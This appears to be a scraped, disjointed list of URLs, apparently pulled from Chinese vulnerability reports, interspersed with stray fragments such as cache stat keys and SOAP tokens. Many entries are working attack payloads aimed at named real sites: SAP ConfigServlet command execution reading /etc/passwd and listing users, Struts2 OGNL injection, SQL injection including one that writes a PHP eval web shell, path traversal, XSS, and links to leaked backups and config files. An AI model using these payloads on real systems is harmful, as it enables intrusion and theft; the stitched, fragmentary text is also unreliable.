http://cie.jlu.edu.cn/index.php?action=admin_login http://qc.homeinns.com/QuestionNaireLogin.aspx http://qc.homeinns.com/index.aspx http://www.gdass.gov.cn/member/list.php?modelid=10 http://m.jobui.com/changecity/city.php?code=170000 http://m.jobui.com/changecity/city.php?code=a www.shopin.net/datamonitor/supply_toSupply.action http://bbs.elecfans.com/config/config_ucenter.php.bak http://game.wo.com.cn/webroot.zip http://www.gbicom.cn/search.html?cid=25&field=sysp&keywords=%E5%B7%A5%E8%A3%85%E8%A3%A4 http://my.xizi.com/index.php?r=members/resetpwd&code=VgRXUlBTAQ==&verify=1 http://nanhai.hinews.cn/config/config_ucenter.php.bak http://sillymvc.googlecode.com/svn-history/r27/branches/iphoneapi/admin.mobile.house.sina.com.cn/include/class/api/sms/verify.class.php http://web-dev-start.googlecode.com/svn/trunk/ResumeHelper/login.sina.com.cn/Properties/AssemblyInfo.cs http://dps4u.googlecode.com/svn-history/r27/trunk/club.book.sina.com.cn/readme.txt http://www.decfc.dongfang.com/download/Commodity_Display.php?ID=1参数存在注入 http://mail.hbpic.gov.cn/webmail/userapply.php?execadd=333&DomainID=111 http://mail.hbpic.gov.cn/webmail/fileshare.php?file=YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4nLDgsOSwxMCwxMSwxMiwxMywxNCBpbnRvIG91dGZpbGUgJ0Q6L3VtYWlsL1dvcmxkQ2xpZW50L2h0bWwvMzYwLnBocCcj http://vv12580.com/login!login.action http://www.c123.com/reg.html http://czms.fhedu.cn/admin/ http://mgs.homeinns.com/motelbbs/ http://www.zscz.gov.cn http://www.zscz.gov.cn/vod.jsp?id=86 http://www.zscz.gov.cn/lindaoshow.jsp?idl=28 http://www.zscz.gov.cn/departmentshow.jsp?id=99 http://www.w3.org/1999/xhtml http://www.2cto.com/statics/css/reset.css http://www.2cto.com/statics/css/zh-cn-system.css http://www.2cto.com/statics/css/table_form.css http://www.2cto.com/statics/css/dialog.css http://ciefr.pku.edu.cn/soso.aspx?soso=a http://jira.staff.139.com/secure/project/ViewProjects.jspa http://gvshp503.haier.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/passwd http://gvshp503.haier.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ls%20-l http://ns.szsi.gov.cn/ http://ns.szsi.gov.cn/webmail/info.php http://www.urpsoft.com/pages/info_list.jsp?classcode=701 http://s.huanqiu.com/.svn/entries http://w.51mp3ring.com/12530.asp?ID=10260 http://w.51mp3ring.com/admin/login.asp http://www.sxpost.com.cn/userlist.asp http://www.sxpost.com.cn/Admin/Admin_login.asp http://www.sxpost.com.cn/Article/ShowArticle.asp http://www.ncie.gov.cn/userlist.asp http://www.ncie.gov.cn/admin/Admin_Login.asp http://www.gdofa.gov.cn https://auth.changyou.com/auth.zip http://data.sports.sohu.com http://data.sports.sohu.com/team_standings.php?search_phases_id=all&search_season_id=2007&_order=* http://www.cnnotary.cn/bbs/help.asp http://fuwu.sdjcy.gov.cn/article/articleWeb_doHyperLink.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.wahaha.com.cn/news/newsdetail.jsp?content_id=14 www.wahaha.com.cn http://zhangzhou.focus.cn//housemarket/bbs_search/index.php的post中存在问题 http://un.letv.com:2008/amdwmnew/jz/jz/jz/riqiquery.jsp http://un.letv.com:2008/amdwmnew/yw/yw/showdata.jsp http://oa.998.com/login/Login.jsp http://ypzs.bjda.gov.cn/ http://ypzs.bjda.gov.cn/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=whoami http://ypzs.bjda.gov.cn/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=netstat%20-an http://ypzs.bjda.gov.cn/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=net%20user http://301.peugeot.com.cn/img_down.php?p= http://www.glxy.chinamobile.com:8080/tims/admin/sys/login.aspx http://yunsha.topics.fumu.com/db/ bbs.fumu.com/config/config_ucenter.php.bak bt:/pentest/database/sqlmap# http://club.sohu.com//more/dahuasohu_cache.php?kindid=664 http://sqlmap.org http://www.wuhusrj.gov.cn/ http://www.wuhusrj.gov.cn/About.aspx?pTypeID=1 http://www.wuhusrj.gov.cn/NewsList.aspx?pTypeID=1 http://www.wuhusrj.gov.cn/TNewsList.aspx?pTypeID=1 http://erp.998.com/WebPortal_HotelFinance/FinanceErrorPage.aspx http://erp.998.com/WebPortal_HotelFinance/setAuthority.aspx http://erp.998.com/WebPortal_HotelFinance/FinanceAllHotelReport.aspx biz.finance.sina.com.cn/meeting/guestMeetingList.php?period_type=1&guest_id=2844 biz.finance.sina.com.cn/meeting/guestMeetingList.php?period_type=1&guest_id=2844 http://www.course.sei.buaa.edu.cn/Users/。另外北航使用的都是1.1.3版本,似乎1.1.6版本这个bug已经修复了,谁知道呢,没人用1.1.6。下面详细讲说一下入侵过程: http://judge.sei.buaa.edu.cn/,另一个是http://crs.sei.buaa.edu.cn/,测试请到http://crs.sei.buaa.edu.cn/,学号stu,密码stu(这个账号和密码是在http://www.course.sei.buaa.edu.cn/demo/上对外公开的)。 http://www.gbicom.cn/passport/login页面注入 http://202.98.7.151:8080/CommunityCorrection/index.html http://system.greentree.com.cn:8080/test/aspx.aspx http://index.bitauto.com/index.bitauto.com.rar http://tee.sports.sohu.com/low.php?club=176 http://erp.998.com/WebPortal_HotelFinance/ http://erp.998.com/WebPortal_HotelFinance/备份/WebPortal_HotelFinance20130605.rar http://erp.998.com/WebPortal_HotelFinance/备份/WebPortal_HotelFinance20130607.rar http://erp.998.com/WebPortal_HotelFinance/备份/WebPortal_HotelFinance20130608.rar http://erp.998.com/WebPortal_HotelFinance/备份/WebPortal_HotelFinance20130807.rar http://www.jqw.cn/c.aspx?keyword=a http://s.haier.com/haierproject/fankui/style-ajax-get.php http://s.haier.com/haierproject/fankui/styl http://sqlmap.org http://www.gdwater.gov.cn:8080/xzxkpub/open/jdcx.searchList2.do http://www.bzxzfw.gov.cn:8080/articleView/articleView!show.action http://www.yumen.gov.cn:8080/web!getItem.action http://www.shandong.gov.cn/col/col4789/index.html http://m.dianping.com/ http://m.dianping.com http://www.liyi99.com/partener.do?_methodName=regist http://www.liyi99.com/picture/-1928514119_dama.jsp http://srm.haier.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/passwd http://srm.haier.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=w http://bm.scs.gov.cn/2014/StudentLogin.aspx)后,会出现验证码,从Cookie中可以得到验证码。 http://www.siteserver.cn/exp/platform.html http://xss.**/00 http://www.hljdep.gov.cn:80/ www.hljdep.gov.cn http://data.sports.sohu.com/nba/nba_team_data.php?order_by=points_average&split=Total&stats=own http://kt.tcl.com/sql.rar http://kt.tcl.com/www.rar http://115.182.21.41:8080/ http://performance.wanda.cn/ www.8868.cn http://www.8868.cn/order/list?userType=1 http://www.8868.cn/order/list?userType=0 http://mail.moe.edu.cn/,并且支持邮箱WEB登陆方式,其中大多数政府管理账号,行政人员邮箱存在被社工隐患、 http://mail.moe.edu.cn http://mail.jdz.gov.cn/ http://mail.xinyu.gov.cn/ http://mail.jxfz.gov.cn/ http://mail.ganzhou.gov.cn/ http://mail.jiujiang.gov.cn/ http://mail.moe.edu.cn/ http://mail.customs.gov.cn/ http://mail.cpd.com.cn/ http://mail.court.gov.cn/ http://mail.npc.gov.cn/ http://mail.chinamil.com.cn/ https://mail.ruc.edu.cn http://travel.haier.com/travel/Hotel/SPHotelInfo/ChangePwd.aspx http://travel.haier.com/travel/BaseInfo/HotelSelect.aspx http://api.ea3w.com/active/vote/get_vote.php?callback=init_vote177699&id=177699 http://123.126.33.224:8080/resin-admin/index.php http://218.204.223.135/Home/Login http://blog.gd.sina.com.cn/bm/reg.php?gid=../../../../../../../../../../etc/passwd%00.jpg http://blog.gd.sina.com.cn/bm/reg.php?gid=../../../../../../../../../../proc/self/status%00.jpg http://bbs.hangzhou.com.cn/config/config_ucenter.php.bak http://bbs.hangzhou.com.cn/config/config_global.php.bak http://sfjd.miit.gov.cn/jsp/base/IndexAction.action http://hi.baidu.com/huting/item/ea77c29727803f9e58146199 http://219.143.235.31/weatherWaringAction/seeDetailOfWarning.do?id=8a81819f422b28f201427d9d4fb96b83 http://gvshp501.haier.com/irj/portal http://gvshp501.haier.com http://gvshp501.haier.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/passwd http://gvshp501.haier.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=netstat%20-antp http://www.jiaohuanlianjie.com/show.php?id=119171 http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://ideaclub.lenovo.com.cn/club/index.php http://ideaclub.lenovo.com.cn/forum/forum.php?mod=viewthread&tid=2864&pid=8742&page=2&extra=#pid8742 http://chanye.hinews.cn/jdcp_page.php?xuh=1281 http://zt.hinews.cn/ghpage.php?xuh=12557 https://vip.lenovodata.com https://vip.lenovodata.com/images_per/login_pic1.jpg https://vip.lenovodata.com/images_per/login_pic1.jpg/1.php http://115.182.94.52:8080/resin-admin/index.php http://open.sogou.com/.svn/entries http://sappp1.haidilao.net:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=netstat%20-an http://chinamobile.hinews.cn/page.php?xuh=100 http://115.182.51.183/html/encoder/index.html http://115.182.51.76/VIP/ http://diybbs.zol.com.cn/38/300_375261.html IP:166.111.4.39 http://www.rsta.tsinghua.edu.cn/search/qyjmxx.php?userid=293 http://www.rsta.tsinghua.edu.cn/search/zjhcxx.php?userid=285 http://pan.baidu.com/share/homerecord?channel=chunlei&clienttype=0&web=1&uk=419593849&num=100&t=1376889848238&page=1&dir=%2F&t=0.57795&order=time&desc=1&_=1376889848238 http://app.sogou.com/.svn/entries http://svn.sogou-inc.com/svn/userplatform/daohang/trunk/app/web http://svn.sogou-inc.com/svn/userplatform http://www.chinaceb.cn/infoview.aspx?iid=660 http://www.chinaceb.cn/xcharacters.aspx?id=2 http://www.wuyun.gov.cn:80/news_show.asp?NewsId=5203 http://219.143.235.85/ http://hi.baidu.com/huting/item/ea77c29727803f9e58146199 http://video.lenovo.com.cn/uc_server/admin.php items:1:number items:1:age items:1:evicted items:1:evicted_nonzero items:1:evicted_time items:1:outofmemory items:1:tailrepairs items:1:reclaimed items:2:number items:2:age items:2:evicted items:2:evicted_nonzero items:2:evicted_time items:2:outofmemory items:2:tailrepairs items:2:reclaimed items:3:number items:3:age items:3:evicted items:3:evicted_nonzero items:3:evicted_time items:3:outofmemory items:3:tailrepairs items:3:reclaimed items:4:number items:4:age items:4:evicted items:4:evicted_nonzero items:4:evicted_time items:4:outofmemory items:4:tailrepairs items:4:reclaimed items:5:number items:5:age items:5:evicted items:5:evicted_nonzero items:5:evicted_time items:5:outofmemory items:5:tailrepairs items:5:reclaimed items:6:number items:6:age items:6:evicted items:6:evicted_nonzero items:6:evicted_time items:6:outofmemory items:6:tailrepairs items:6:reclaimed items:7:number items:7:age items:7:evicted items:7:evicted_nonzero items:7:evicted_time items:7:outofmemory items:7:tailrepairs items:7:reclaimed items:8:number items:8:age items:8:evicted items:8:evicted_nonzero items:8:evicted_time items:8:outofmemory items:8:tailrepairs items:8:reclaimed items:9:number items:9:age items:9:evicted items:9:evicted_nonzero items:9:evicted_time items:9:outofmemory items:9:tailrepairs items:9:reclaimed items:10:number items:10:age items:10:evicted items:10:evicted_nonzero items:10:evicted_time items:10:outofmemory items:10:tailrepairs items:10:reclaimed items:11:number items:11:age items:11:evicted items:11:evicted_nonzero items:11:evicted_time items:11:outofmemory items:11:tailrepairs items:11:reclaimed items:12:number items:12:age items:12:evicted items:12:evicted_nonzero items:12:evicted_time items:12:outofmemory items:12:tailrepairs items:12:reclaimed items:13:number items:13:age items:13:evicted items:13:evicted_nonzero items:13:evicted_time items:13:outofmemory items:13:tailrepairs items:13:reclaimed items:14:number items:14:age items:14:evicted items:14:evicted_nonzero items:14:evicted_time items:14:outofmemory items:14:tailrepairs items:14:reclaimed items:15:number items:15:age items:15:evicted items:15:evicted_nonzero items:15:evicted_time items:15:outofmemory items:15:tailrepairs items:15:reclaimed items:16:number items:16:age items:16:evicted items:16:evicted_nonzero items:16:evicted_time items:16:outofmemory items:16:tailrepairs items:16:reclaimed items:17:number items:17:age items:17:evicted items:17:evicted_nonzero items:17:evicted_time items:17:outofmemory items:17:tailrepairs items:17:reclaimed items:18:number items:18:age items:18:evicted items:18:evicted_nonzero items:18:evicted_time items:18:outofmemory items:18:tailrepairs items:18:reclaimed items:19:number items:19:age items:19:evicted items:19:evicted_nonzero items:19:evicted_time items:19:outofmemory items:19:tailrepairs items:19:reclaimed items:20:number items:20:age items:20:evicted items:20:evicted_nonzero items:20:evicted_time items:20:outofmemory items:20:tailrepairs items:20:reclaimed items:22:number items:22:age items:22:evicted items:22:evicted_nonzero items:22:evicted_time items:22:outofmemory items:22:tailrepairs items:22:reclaimed items:23:number items:23:age items:23:evicted items:23:evicted_nonzero items:23:evicted_time items:23:outofmemory items:23:tailrepairs items:23:reclaimed items:24:number items:24:age items:24:evicted items:24:evicted_nonzero items:24:evicted_time items:24:outofmemory items:24:tailrepairs items:24:reclaimed wp_:category_relationships:25292 wp_:category_relationships:26381 wp_:category_relationships:22802 wp_:category_relationships:21064 wp_:category_relationships:21861 wp_:category_relationships:22677 wp_:category_relationships:26344 wp_:category_relationships:19610 wp_:post_tag_relationships:19610 wp_:category_relationships:21675 wp_:category_relationships:25292 wp_:category_relationships:25292 http://t.lejuopen.letv.com/api/nst.php http://115.182.21.51/login.php http://115.182.21.51/admin_manage_growth.php http://115.182.21.51/manage_all_site.php?website=true&ac=common&page=1 http://aobo.tcl.com/upimg_ok.asp http://219.143.235.90:80/ http://api.mobile.meituan.com/group/v1/user/503xxxxxx76/ordercenter/id?ci=xx&dealFields=imgurl%2Csmstitle%2Crefund%2Cmenu%2Ctitle%2Cbrandname%2Cprice%2Cvalue%2Cstatus%2Cend%2Crdcount%2Crdplocs%2Ctips%2Cslug%2Csubcate%2Cid&orderIds=26108xxxxx&token=oAi5-rtCVxxxxxxxxxxxxxdQdcasq&utm_campaign=AgroupBgroup&utm_content=4FDxxxxxxxxxxxxxxFC200B140FA&utm_medium=iphone&utm_source=AppStore&utm_term=4.0.3&uuid=4FDE1F0xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxB140FA http://guangchangwu.vcu.ku6.com http://robot.lenovo.com.cn/images/.svn/entries http://robot.lenovo.com.cn/images/ http://limit.bbyyt.com/center.html,页面弹出路由器登录框。 http://cb.baidu.com/ecom?di=xxxxxx&fn=BAIDU_CLB_SETJSONADSLOT&tpl=BAIDU_CLB_SETJSONADSLOT&asp_refer=页面内容如下: http://www.8868.cn/localmessage/messagecontent/347110/2/0 https://www.hn.10086.cn/Shopping/ordernews/page/queryBuyPhoneOrderDetails.action?orderNum=SC20130101395415113&phoneInfo.flag=001 https://shop.hn.chinamobile.com/Shopping/ordernews/page/querySelNumOrderDetails.action?ordernum=201301130110481410&flag=001 https://www.hn.10086.cn/Shopping/ordernews/page/queryBuyPhoneOrderDetails.action?orderNum=SC20130101395415113&phoneInfo.flag=001 http://122.225.200.160/ http://122.225.200.160:80/ http://www.target.com/siteserver/bbs/background_thread.aspx?UserName=test&Title='%20and%201=@@version%20and%201='&DateFrom=&DateTo=&ForumID=0 http://www.target.com/siteserver/bbs/background_post.aspx?UserName=&Title='%20and%20%201=@@version%20and%201='1&DateFrom=&DateTo=&ForumID=0 http://www.target.com/siteserver/bbs/background_user.aspx?UserGroup=7&PageNum=0&Keyword='%20and%201=@@version%20and%201='&CreationDate=0&LastActivityDate=0 http://wooyun.org/bugs/wooyun-2013-036072 http://www.dianping.com/member/jsonp/followUser?memberId=xxxxxx http://www.dianping.com/member/42915773/fans http://www.suning.com.cn/ListArticle.aspx?BID=31&RID=19 http://www.suning.com.cn/ListJob.aspx?BID=49&RID=1 http://www.suning.com.cn/ListPic.aspx?BID=1&DID=36&RID=5&SID=81 http://www.suning.com.cn/ListPicText.aspx?BID=17&RID=13&SID=1 http://www.suning.com.cn/ListProcure.aspx?BID=31&RID=19 http://www.suning.com.cn/ListProcure1.aspx?BID=31&RID=19 http://www.suning.com.cn/ListTitle.aspx?BID=1&p=1&RID=1 http://food.hinews.cn/wei_mhnsj.php?xuh=11 http://food.hinews.cn/wei_mhnsj.php?xuh=11 http://food.hinews.cn/wei_mhnsj.php?xuh=11 http://hz.zhujia360.com/loupan/all-keydfds%27%20or%201=%271 http://weboa.gto365.com/ http://weboa.gto365.com/e3oa/main.asp http://weboa.gto365.com/e3oa/gonggao/filelist.asp?type=1 http://www.dianping.com/upload/shop/2184646 http://m.ku6.com http://suntv.ku6.com http://219.143.235.52:80/ http://219.143.235.52:80/ http://www.zteict.com/news.aspx?id=91%20and%201=1 http://www.zteict.com/news.aspx?id=91%20and%201=2 http://www.zteict.com/GenericErrorPage.htm?aspxerrorpath=/news.aspx http://trip.dahe.cn/trip.dahe.cn.tar.gz http://sh.dahe.cn/sh.dahe.cn.tar.gz http://bang.dahe.cn/robots.txt/a.php http://jdms.dahe.cn/robots.txt/a.php http://117.121.58.108:8080/login http://117.121.58.109:8080/login http://58.83.158.54/ http://myphoto.tech.sina.com.cn/p/gallery.php?uid=2091776904 http://58.56.128.89/security/loginInit.action http://www.cfi.cn/drawtext.aspx?type=channel&ttype=sub&catid=A0A1A8A1172A1176 http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf[/flash http://somd5.com/index.php?act=xss http://appuu.cn/app_detail.do?appId=19411 http://www.bjbfjxw.cn http://www.bjbfjxw.cn/list.asp?type=2&userid=20860168&sort=法规培训 http://edm.org.hc360.com/manage/login/userlogin www.cnaaa.com http://您服务器的IP/由于客户数量庞大,技术部较忙,VPS产品原则不提供技术支持。 http://www.lvdouke.com http://www.lvdouke.com/android.php?ac=newdetail&cname=zuixin&newid=154 demo.yyjia.com/apple.php?id=26243&ac=detail&type=iphone&cname= http://app100651769.qzoneapp.com/ http://www.jxzfcg.gov.cn/ http://115.236.99.179/template/main.jsp http://115.236.99.179/sys/main.action http://60.191.115.164:8080/sso/sys/main.action http://60.191.115.164:8080/sso/sys/main.action http://quote.cfi.cn/ReadImage.aspx?stockcode=cnyusd&class=BaseWhpj&img=1 http://forex.cfi.cn/drawtext.aspx?type=channel&catid=A0A1A1080A1081 http://m.cfi.cn/indexcss.aspx?nodekey=A0A4127A4579 http://industry.cfi.cn/indexcss.aspx?nodekey=A0A4127A4128 http://chat.21cn.com/admin.php http://ctech.baidu.com/ http://news.ccidnet.com/art/1032/20131123/2167.html http://bbs.m.duba.com http://bbs.m.duba.com/config/config_global.php.bak http://bbs.m.duba.com/config/config_ucenter.php.bak http://sdzc.sdeic.gov.cn/eap/】由原来的c/s模式改为b/s模式了。新开的的系统就会有可能出现Bug。 www.2@dongfang.com http://team.jj.cn/index.php http://runforlove.org.cn/info.php?id=25 http://runforlove.org.cn/info.php?id=25 http://115.182.2.134/login http://www.tudou.com/programs/view/1My_f_VmPEM/ http://ks.cqvip.com/ks.cqvip.com.rar http://www.lz.chinanews.com/ShowToday.aspx?NewsID=5559‎ http://www.lz.chinanews.com/show2.aspx?NewsId=4773 http://www.ctce.com.cn/ http://www.ctce.com.cn/root/login.asp http://bid2.ha.sgcc.com.cn http://bid2.ha.sgcc.com.cn/upgrade http://bid2.ha.sgcc.com.cn/upgrade/acu_test_QXhf9.asp;.jpg http://bid2.ha.sgcc.com.cn/WebService/upload/ http://go.microsoft.com/fwlink/?LinkId=169433 http://sdk.test2.g.uc.cn/ss"/ www.9game.cn跟UC是一个备案号 http://www.7po.com/.svn/entries http://www.decfc.dongfang.com/media/media_Display.php?Language=GB'&NID=65 http://www.decfc.dongfang.com/download/Commodity_List.php?ClassName=????????&ID=4'&Language=GB&type=class http://www.decfc.dongfang.com/download/Commodity_List.php?ID=1 http://bbsuc.duba.net http://bbsuc.duba.net/data/config.inc.php.bak http://blog.ccidnet.com/blog.php?mod=group&fid=2557 http://blog.ccidnet.com/blog.php?mod=group&fid=2557 http://blog.ccidnet.com/blog.php?mod=group&fid=2557 http://zt.100che.cn/bjlgh/photo.php?id=4 http://192.168.1.1/userRpm/config.bin http://target-ip/userRpm/config.bin,下载到已经加密的config.bin文件,解密即可得到该路由器账户。 http://hao.jj.cn http://www.520.net http://wap2.qiushibaike.com/login http://piao.bitauto.com/shoupiaodian/beijing.html?area=%E4%B8%9C%E5%9F%8E%E5%8C%BA http://education.ccidnet.com/ http://webservicen.it168.com/service.asmx?wsdl SOAP-ENV:Header/ SOAP-ENV:Body urn:MultiProductIdTofindArticle urn:productId urn:productId urn:articletypeId urn:articletypeId urn:pageSize urn:pageSize urn:stTime urn:stTime urn:endTime urn:endTime urn:regionalId urn:regionalId urn:pageNumber urn:pageNumber urn:MultiProductIdTofindArticle SOAP-ENV:Body SOAP-ENV:Envelope http://122.227.237.196/ http://122.227.237.196//portalPage/news!toindex.action http://wooyun.org/bugs/wooyun-2013-031912 http://aeps.sgepri.sgcc.com.cn/aeps/ch/guestbook/Login.aspx http://www.seedchina.com.cn/1.rar http://www.chinanpo.gov.cn/chinanpo.rar http://happy.enet.com.cn/php/list.php?cid=106 http://www.hyedz.gov.cn/kfqxw_info.php?rid=813 http://g.iiyi.com/med/threadlist?fid=101 www.iiyi.com/bbs/ http://www.brightfood.com/cn/news_p.aspx?Class_ID=14 http://www.brightfood.com/cn/product.aspx?Class_ID=107 http://henan.people.com.cn/gtzy/liuyan.php http://henan.people.com.cn/liuyan_online.php http://218.58.70.201/haier/sys/Login_dologin.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://vip.kangq.com/business.php?action=merchant&mid=137 www.xyj.zy.jj.cn http://www.xyj.zy.jj.cn/theme/detail?id=10005&tid=1 http://goldpen.ccidnet.com/goldpen/ URL:http://www.enjoy3c.com/admin/login http://cc.zy.jj.cn/msg/detail?id=11947 http://115.182.21.51 http://115.182.21.51/siterank.php?ranktype=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ http://115.182.21.51/common/ http://115.182.21.51/flashchart/ http://ui.letv.com/home.php?mod=space&uid=23471696&do=album&picid=2093&goto=down#pic_block http://kf.buaa.edu.cn/index.html http://bwc.buaa.edu.cn http://bwc.buaa.edu.cn/showquestion.action http://udbms.nlsde.buaa.edu.cn http://udbms.nlsde.buaa.edu.cn/AUDRScienceWeb/downloadAction.action www.fjlyzfcg.gov.cn http://www.fjlyzfcg.gov.cn/viewbody.cfm?id=25789 http://i.360.cn/findpwd/setpwdfromemail?vc=e%2FwljiqD9WGv%2FwDyS93BghveGh%2FDYG4oMjJwcxGlcnSDZP3qIW4deYwnCpkdbCSZ3ByODXHZYDCx32A46l%2FBXxk6qo5oABIr6ZrywAoPB8DZuX81j%2Bb%2F2w%3D%3D&qid=507290669 http://i.360.cn/findpwd/setpwdfromemail?vc=e%2FwljiqD9WGv%2FwDyS93BghveGh%2FDYG4oMjJwcxGlcnSDZP3qIW4deYwnCpkdbCSZ3ByODXHZYDCx32A46l%2FBXxk6qo5oABIr6ZrywAoPB8DZuX81j%2Bb%2F2w%3D%3D&qid=507290670 http://www.woxihuan.com/ http://www.woxihuan.com/star/timeline?qid=268296138 http://i.360.cn/findpwd/setpwdfromemail?vc=e%2FwljiqD9WGv%2FwDyS93BghveGh%2FDYG4oMjJwcxGlcnSDZP3qIW4deYwnCpkdbCSZ3ByODXHZYDCx32A46l%2FBXxk6qo5oABIr6ZrywAoPB8DZuX81j%2Bb%2F2w%3D%3D&qid=268296138 www.gdww.gov.cn http://www.gdww.gov.cn/vote/result.php?VOTE_ID=14 http://www.gdww.gov.cn/vote/result.php?VOTE_ID=14 http://202.136.217.188:8086/Test/TestLogin.aspx http://ios.update.trip8080.com/iphone/v0600/orderQuery.htm http://wooyun.org/bugs/wooyun-2013-031912 http://www.google.com.tw/#newwindow=1&q=inurl:%2Fch%2Fguestbook%2FLogin.aspx http://wooyun.org/bugs/wooyun-2013-031912 http://wooyun.org/bugs/wooyun-2013-028753 inurl:TransactList.aspx?ItemName= http://58.19.178.115/waiwang/login/TransactList.aspx?ItemName=%27and/**/1/**/=/**/%28/**/select/**/@@version/**/%29/**/--/**/&LookWhat=Look http://www.ycxz.gov.cn/waiwang/login/TransactList.aspx?ItemName=%27and/**/1/**/=/**/%28/**/select/**/@@version/**/%29/**/--/**/&LookWhat=Look http://www.mgxzfw.gov.cn/login/TransactList.aspx?ItemName=%27and/**/1/**/=/**/%28/**/select/**/@@version/**/%29/**/--/**/&LookWhat=Look http://www.lwxzfw.gov.cn/login/TransactList.aspx?ItemName=%27and/**/1/**/=/**/%28/**/select/**/@@version/**/%29/**/--/**/&LookWhat=Look http://zwdt.yinan.gov.cn/login/TransactList.aspx?ItemName=%27and/**/1/**/=/**/%28/**/select/**/@@version/**/%29/**/--/**/&LookWhat=Look http://www.mgxzfw.gov.cn/login/TransactList.aspx?ItemName=%27and/**/1/**/=/**/%28/**/select/**/@@version/**/%29/**/--/**/&LookWhat=Look http://fed.renren.com http://ued.aili.com/?author=*(1、2、3、。。。)得到用户名 http://ued.aili.com/wp-login.php https://[马赛克]/portal/public/Registration.action https://[马赛克]/portal/BAA/Index.action http://api.zto.cn/WebService.asmx?wsdl SOAP-ENV:Header/ SOAP-ENV:Body urn:Search urn:Userid urn:Userid urn:Pwd urn:Pwd urn:SrtjobNo urn:SrtjobNo urn:Search SOAP-ENV:Body SOAP-ENV:Envelope http://183.62.54.120/proapply/login.do http://202.192.18.172:8080/proapply/login.do http://202.192.18.173/cgjsb/login.do http://localhost/cpcconsole/filelist.jsp?dir=/ http://localhost/cpcconsole/fileview.jsp?path=/etc/passwd 